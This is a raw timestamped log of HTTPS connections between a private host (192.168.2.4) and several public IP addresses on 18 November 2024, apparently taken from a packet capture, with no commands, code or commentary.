                                          Nov 18, 2024 23:43:56.990452051 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.990840912 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.991492987 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.991566896 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:56.991806030 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:56.997653961 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.001306057 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.001323938 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.001806021 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.002115011 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.002203941 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.002230883 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.027431011 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.033601999 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.033612013 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.033612013 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.033641100 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.033695936 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.033699036 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.033720016 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.033739090 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.047369957 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.048614025 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.048854113 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.048897028 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.049067974 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.050328970 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.050494909 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.051444054 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.051531076 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.051569939 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.079799891 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.079829931 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.079833031 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.095525026 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.095544100 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.113703012 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.113729000 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.113763094 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.113796949 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.114712954 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.114839077 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.114993095 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.115031958 CET49751443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.115067959 CET4434975113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.115109921 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.116679907 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.116695881 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.116728067 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.116863966 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.116910934 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.116960049 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.116988897 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.116991997 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.117710114 CET49750443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.117744923 CET4434975013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.121004105 CET49753443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.121037960 CET4434975313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.121052980 CET49752443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.121066093 CET4434975213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.123081923 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.123560905 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.125174999 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.129065990 CET49747443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.129096031 CET4434974713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.133488894 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.133547068 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.133632898 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.133641958 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.133680105 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.133717060 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.133752108 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.133780003 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134068966 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134130955 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.134171009 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134298086 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134304047 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134315014 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.134550095 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134556055 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134573936 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.134582996 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.134785891 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.134816885 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.135682106 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.164808035 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.164861917 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.164994001 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.165035963 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.165086985 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.169563055 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.169620037 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.169766903 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.169945955 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.169975996 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.171519995 CET49754443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.171536922 CET44349754192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.176441908 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.223330975 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.237446070 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.247113943 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.247134924 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.248733997 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.248831987 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.260337114 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.260337114 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.260390997 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.260549068 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.273741007 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.274240971 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.274275064 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.275501013 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.275701046 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.277606010 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.277606010 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.277647018 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.277693033 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.289875031 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.289984941 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:57.291954041 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:57.292009115 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.292359114 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.293546915 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:57.306963921 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.306978941 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.326936960 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.327006102 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.339329004 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.339409113 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.339466095 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.339608908 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.339900017 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.342611074 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.349080086 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.380306959 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.396692038 CET49744443192.168.2.4192.254.232.133
                                          Nov 18, 2024 23:43:57.396739960 CET44349744192.254.232.133192.168.2.4
                                          Nov 18, 2024 23:43:57.414863110 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.414927006 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.414947987 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.414990902 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.415031910 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.415050983 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.415055037 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.415116072 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.415163994 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.415163994 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.415164948 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.415574074 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.416769981 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.416815042 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.416861057 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.416877985 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.416908026 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.417011023 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.490787029 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.503829002 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.503875017 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.503918886 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.503992081 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.507072926 CET49748443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.507114887 CET44349748152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.521079063 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.521128893 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.521229982 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.521578074 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:57.521612883 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:57.531486988 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.531531096 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.531586885 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.531610966 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.531636953 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.531650066 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.531677008 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.531688929 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.531778097 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.531805992 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.531975031 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.533065081 CET49746443192.168.2.413.35.58.91
                                          Nov 18, 2024 23:43:57.533087015 CET4434974613.35.58.91192.168.2.4
                                          Nov 18, 2024 23:43:57.534725904 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.539300919 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.539468050 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.539557934 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:57.540694952 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:57.540709019 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.540741920 CET49756443192.168.2.4184.28.90.27
                                          Nov 18, 2024 23:43:57.540752888 CET44349756184.28.90.27192.168.2.4
                                          Nov 18, 2024 23:43:57.607836008 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.607867002 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.607883930 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.607916117 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.607933998 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.607953072 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.607966900 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.607978106 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.607980967 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.608006954 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.608011007 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.608151913 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.608194113 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.608222961 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.608237028 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.608338118 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.608345985 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.608532906 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.609055996 CET49745443192.168.2.4192.229.133.221
                                          Nov 18, 2024 23:43:57.609072924 CET44349745192.229.133.221192.168.2.4
                                          Nov 18, 2024 23:43:57.892899990 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.893945932 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.907388926 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.909041882 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.923866034 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:57.942718983 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.942723989 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.958441019 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.958446980 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:57.974100113 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.190221071 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.190303087 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.190326929 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.190409899 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.191422939 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.191488981 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.194267035 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.194354057 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.197840929 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.197906017 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.197967052 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.198015928 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.198064089 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.198105097 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.199043036 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.199101925 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.199224949 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.199280024 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.201900005 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.201975107 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.202012062 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.206273079 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.206348896 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.210221052 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.210464954 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.217677116 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.217745066 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.221414089 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.221502066 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.225085020 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.225225925 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.225356102 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.225378990 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.228955984 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.228970051 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.228984118 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.228995085 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.229015112 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.229032040 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.229038954 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.229043961 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.276108027 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.276108027 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.276129961 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.276163101 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.276227951 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.351447105 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.351466894 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.351515055 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.351645947 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.351645947 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.355307102 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.355398893 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.355446100 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.356256008 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.356312990 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.356359959 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.358328104 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.358370066 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.358436108 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.358452082 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.358613014 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.358661890 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.360423088 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.360734940 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.360800028 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.376024008 CET49760443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.376060963 CET4434976013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.376705885 CET49757443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.376739025 CET4434975713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.377515078 CET49759443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.377527952 CET4434975913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.378021002 CET49758443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.378042936 CET4434975813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.390000105 CET49761443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:43:58.390048981 CET4434976113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:43:58.568685055 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.569000959 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.569063902 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.569978952 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.570060015 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.570333004 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.570422888 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.570632935 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.570648909 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.612556934 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.802648067 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.802700996 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.802755117 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.802761078 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:43:58.802807093 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.804461956 CET49764443192.168.2.4152.199.21.175
                                          Nov 18, 2024 23:43:58.804488897 CET44349764152.199.21.175192.168.2.4
                                          Nov 18, 2024 23:44:03.305413008 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:03.305502892 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:03.305586100 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:03.306639910 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:03.306678057 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:04.416285038 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:04.416371107 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:04.420134068 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:04.420182943 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:04.420622110 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:04.469316959 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.318749905 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:05.318833113 CET44349740142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:44:05.318907022 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:05.346858978 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.387372971 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.721101999 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.721163988 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.721187115 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.721218109 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.721280098 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.721365929 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.721366882 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.721406937 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.721457958 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.721488953 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.721927881 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.722039938 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.722055912 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.768318892 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:05.846365929 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.846501112 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:05.846568108 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:06.553786993 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:06.553858995 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:06.553894043 CET49769443192.168.2.44.175.87.197
                                          Nov 18, 2024 23:44:06.553911924 CET443497694.175.87.197192.168.2.4
                                          Nov 18, 2024 23:44:06.787348986 CET49740443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:44:06.787381887 CET44349740142.250.185.196192.168.2.4
